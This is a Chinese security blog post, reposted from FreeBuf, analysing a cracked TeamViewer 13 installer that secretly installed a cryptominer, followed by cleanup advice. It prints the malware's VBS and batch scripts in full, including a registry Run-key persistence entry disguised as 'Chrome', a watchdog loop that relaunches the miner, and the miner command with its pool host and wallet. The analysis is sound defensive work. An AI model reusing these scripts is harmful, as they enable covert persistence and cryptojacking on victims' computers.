安基网 首页 资讯 安全报 查看内容

你下载的TeamViewer13破解版可能有毒

2018-8-13 11:50| 投稿: lofor |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 0×0 故事背景最近有个远程管理一下某内网服(tiao)务(ban)器(ji)的需求,映射到公网又不安全毕竟黑帽子这么多,思来想去之后还是觉得老老实实装个Teamviewer最靠谱,度娘一下发现还真的不少破解版资源可以下载 ...

0×0 故事背景 

最近有个远程管理一下某内网服(tiao)务(ban)器(ji)的需求,映射到公网又不安全毕竟黑帽子这么多,思来想去之后还是觉得老老实实装个Teamviewer最靠谱,度娘一下发现还真的不少破解版资源可以下载,于是随意下载一个破解版准备开始操作。

 0×1 安装过程 

先看一下文件描述信息也没有发现什么问题,就开始下一步安装了。 

安装完成了功能正常,一切OK,渐渐的电脑开始卡到爆,敏感的白帽子有一种不好的预感。
 0×2 问题排查

开始仔细的检查一下进程列表在最后发现了一个奇怪的进程,居然被植入了挖矿病毒这个也太明显了吧,也不搞点进程注入无文件攻击之类的高端技术,系统盘下面也多了不少.bat与.vbs文件。直接结束了挖矿的进程之后又自动起来了,还是看看这些同伴里面到底写了什么玩意。 

0.Servicecrsssr.vbs:
 im WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "%windir%\winvprse.bat", 0Set WShell = Nothing

1.Winprs.bat: 

@Echo OffREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run /v "Chrome" /f /t REG_SZ /d "%windir%\servicecrsssr.vbs"Exit

2.Winvpr.vbs:

im WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "winprs.bat", 0Set WShell = Nothing

3.Winvprse.bat:

 @echo offSETLOCAL EnableExtensions:starttimeout /t 160 /nobreak > NULecho offtasklist /FI "IMAGENAME eq wmipvrse.exe" 2>NUL | find /I /N "wmipvrse.exe" >NULif "%ERRORLEVEL%"=="0" goto starttasklist /FI "IMAGENAME eq wmipvrse.exe" 2>NUL | find /I /N "wmipvrse.exe" >NULif "%ERRORLEVEL%"=="1" goto processnotrunning:processnotrunningstart "" "%windir%\xdgaudio.vbs"goto startexit

4.xdgaudio.vbs

Dim WShell

Set WShell = CreateObject("WScript.Shell")WShell.Run "wmipvrse.exe --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://krb.crypto-coins.club:5555 -u KjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ -p x", 0

Set WShell = Nothing

 5.Wmipvrse.exe

 矿池与钱包都这么出来了,看看到底挖了多少钱。 0×3 逆向分析

  对Wmipvrse.exe这个进程里面的东西还是感到好奇,决定还是看一看,已经加壳了不过还好是UPX的标准壳可直接脱。
CPU-miner github上面的开源代码
0×4 病毒清理

 事到如此根据几个vbs与bat文件的内容,运行原理还是比较清楚了,就动手清理了。 

Step1:使用PCHunter删除6个病毒母体

servicecrsssr.vbs

Winprs.bat 

Winvpr.vbs 

Winvprse.bat

Wmipvrse.exe

 xdgaudio.vbs

Step2:清除注册表

0×5 总结 

1.下载软件尽量选择官方平台或者可信的第三方软件平台。

2.天下没有白吃的午餐,破解版软件里面可能含有一些让你惊喜的病毒木马后门,也许是一个大礼包呢。

3.安全无小事,日常需注意。

*本文作者:si1ence,转载请注明来自FreeBuf.COM

Tag标签:

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人
1

路过

鸡蛋

刚表态过的朋友 (1 人)

相关阅读

最新评论

最新

返回顶部